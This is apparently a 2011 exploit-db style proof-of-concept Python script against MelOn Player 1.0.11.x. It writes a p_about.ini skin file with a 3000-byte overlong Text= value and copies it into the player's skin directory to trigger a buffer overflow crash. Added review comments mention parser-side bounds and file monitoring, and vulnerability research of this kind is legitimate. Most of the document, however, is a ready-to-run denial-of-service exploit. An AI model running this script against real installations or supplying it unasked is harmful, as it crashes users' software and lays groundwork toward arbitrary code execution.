# Exploit Title: MelOnPlayer 1.0.11.x Denial of Service POC
# Date: 09/09/2011
# Author: modpr0be
# Software Link: http://www.melon.co.id/cs/guide/download/player.do
# Vulnerable version: 1.0.11.x
# Tested on: Windows XP SP3 (VirtualBox 4.1.0 r73009)
# CVE : N/A
# Thanks: offsec, exploit-db, corelan-team, 5M7X, loneferret, mr_me, _sinner
#### Software description:
# Melon Player is a well-known application in Indonesia for playing songs provided by
# the Melon portal (http://www.melon.co.id). It can play many music file types,
# such as mp3, wav, wma, mp4, and others. The player can play files on your local
# computer or stream them online from the Melon portal. Songs can also be
# downloaded to your local computer.
#
#### Vulnerable information:
# The main program (IDMelonPlayer.exe) suffers from a buffer overflow vulnerability
# when opening the p_about.ini file. (Note: p_about.ini is a configuration file that
# is part of the skin template. It holds the program information shown under
# Menu → Information.) The overflow is triggered when extra bytes are added to
# part of the file (the Text section), which could allow an attacker to execute
# arbitrary code on a system where Melon Player is installed.
#
### Some Conditions:
# This is just the POC; it only crashes the program.
# and it's unicode ;)
#
##
#!/usr/bin/python
import os,sys,shutil,time
# Leading part of the p_about.ini skin template: the [MAIN], [MAINBG] and
# [MAINMASK] layout sections, two buttons, one static image and the [TEXT_1]
# title entry. It is written unchanged ahead of the oversized [TEXT_2] section.
# NOTE(review): in this listing the keys of each section sit on one line separated
# by spaces; an INI file normally has one key per line, so the line breaks were
# presumably lost when the page was extracted. Confirm against the original.
# NOTE(review): the `??` in the Name= values look like characters lost to an
# encoding conversion; they are left exactly as shown.
header=("""[MAIN] MainStyle=SKIN Resize=NO Mask=YES BGStyle=IMAGE DefSize=0,0,427,136 Image=skin.bmp Button=2 Slider= Static=1 Text=4 Edit= Combo=
[MAINBG] TopLeft=145,389,6,21 TopCenter=153,389,11,21 TopRight=166,389,6,21 MiddleLeft=145,412,6,21 MiddleCenter=153,412,11,21 MiddleRight=166,412,6,21 BottomLeft=145,435,6,34 BottomCenter=153,435,11,34 BottomRight=166,435,6,34
[MAINMASK] TopLeft=174,389,10,10 TopCenter=185,389,10,10 TopRight=196,389,10,10 MiddleLeft=185,389,10,10 MiddleCenter=185,389,10,10 MiddleRight=185,389,10,10 BottomLeft=174,400,10,10 BottomCenter=185,389,10,10 BottomRight=196,400,10,10
[BUTTON_1] Name=?? ID=1001 ResizeStyle=TOP_LEFT Tooltip= CheckBox=FALSE Position=410,4,13,13 NormalRect=223,389,13,13 OverRect=238,389,13,13 DownRect=253,389,13,13 DisabledRect=223,389,13,13 MaskRect=2000,0,13,13
[BUTTON_2] Name=?? ID=1002 ResizeStyle=TOP_LEFT Tooltip= CheckBox=FALSE Position=173,105,80,20 NormalRect=0,763,80,20 OverRect=0,763,80,20 DownRect=81,763,80,20 DisabledRect=162,763,80,20 MaskRect=2000,0,80,20
[STATIC_1] Name=???_?? ID=2001 Position=20,31,72,84 TopLeft=14,478,72,84 TopCenter= TopRight= MiddleLeft= MiddleCenter= MiddleRight= BottomLeft= BottomCenter= BottomRight=
[TEXT_1] Name=popup Name sdw ID=3701 Position=2,2,420,14 Text=MelOn Player Font=Arial FontSize=12 FontBold= Align=CENTER FontColor=0,0,0 """)
# Trailing part of the skin template: the [TEXT_3] version line and the [TEXT_4]
# copyright line. It is appended unchanged after the oversized [TEXT_2] section,
# so the generated file has the four text entries that Text=4 in [MAIN] declares.
footer=(""" [TEXT_3] Name=???? ID=3703 Position=104,50,243,14 Text=Melon Player Version 1.0.0.101102 Font=Arial FontSize=12 FontBold= Align= FontColor=0,0,0
[TEXT_4] Name=Copyright ID=3704 Position=104,72,303,14 Text=Copyright PT. Melon Indonesia. All Right Reserved. Font=Arial FontSize=12 FontBold= Align= FontColor=0,0,0 """)
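# Name of the skin configuration file the advisory header identifies as the
# input that triggers the overflow.
filename = "p_about.ini"

# Absolute path of the generated file in the current working directory; it is
# the source of the later copy into the skin directory.
splash = os.path.abspath(filename)

# Default skin directory of the installed player. A raw string keeps the
# backslashes literal; the un-prefixed form relied on "\P", "\M" and "\S" not
# being recognised escape sequences, which newer interpreters warn about.
skindir = r"C:\Program Files\MelonPlayerID\Skin"

# Overlong value placed in the Text= key of [TEXT_2]. Per the advisory header
# this only demonstrates a crash of the player; a length bound on values read
# from skin .ini files is the fix on the parser side.
junk = "A" * 3000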
# [TEXT_2] section carrying the overlong `junk` string as its Text= value. It is
# the only part of the generated file that differs from an ordinary skin
# template; the advisory header attributes the overflow to extra bytes in this
# Text field when the player opens p_about.ini.
# NOTE(review): for triage, a Text= value far longer than the short captions
# used by the other entries is the visible anomaly in such a file.
buggy=(""" [TEXT_2] Name=popup Name ID=3702 Position=3,3,420,14 Text="""+junk+ """ Font=Arial FontSize=12 FontBold= Align=CENTER FontColor=170,170,170\r\n""")
# Console banner printed once the file has been written; it is not part of the
# generated .ini content.
banner=(""" [*] MelOnPlayer 1.0.11.x Denial of Service POC [*] modpr0be[at]spentera[dot]com. [*] thanks a lot: cyb3r.anbu | otoy :) ===================================================== """)
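# Write the proof-of-concept p_about.ini and copy it into the player's skin
# directory.
#
# Changes from the collapsed original:
#   * the output file is opened only after the platform and directory checks
#     pass, so a failed check no longer leaves an empty p_about.ini (or
#     truncates an existing one) in the working directory;
#   * the handle is managed by `with`, so it is closed on every path, and it no
#     longer shadows the builtin name `file`;
#   * each print takes one pre-formatted string, which produces the same
#     output under the print statement and the print function.
#
# NOTE(review): the copy targets a directory under Program Files and the error
# path below points at permissions, so the precondition appears to be write
# access to the skin directory. Restricting that access, monitoring
# p_about.ini for unexpected changes, and bounding Text= lengths in the
# parser are the relevant controls.
if os.name != 'nt':
    print("[-] Please run this script on Windows.")
    sys.exit()

if not os.path.isdir(skindir):
    print("[-] Could not find Skin directory, is MelOn Player installed?")
    sys.exit()

try:
    # Template head + oversized [TEXT_2] section + template tail.
    with open(filename, 'w') as poc_file:
        poc_file.write(header + buggy + footer)
    print(banner)
    print("[*] Creating the malicious .ini file..")
    time.sleep(2)
    print("[*] Malicious file (POC) %s created.." % filename)
    print("[*] Path: %s" % splash)
    # The file is closed (and therefore flushed) before it is copied.
    shutil.copy2(splash, skindir)
    print("[*] File %s has been copied to %s" % (filename, skindir))
except IOError:
    print("[-] Could not write to destination folder, check permission..")
    sys.exit()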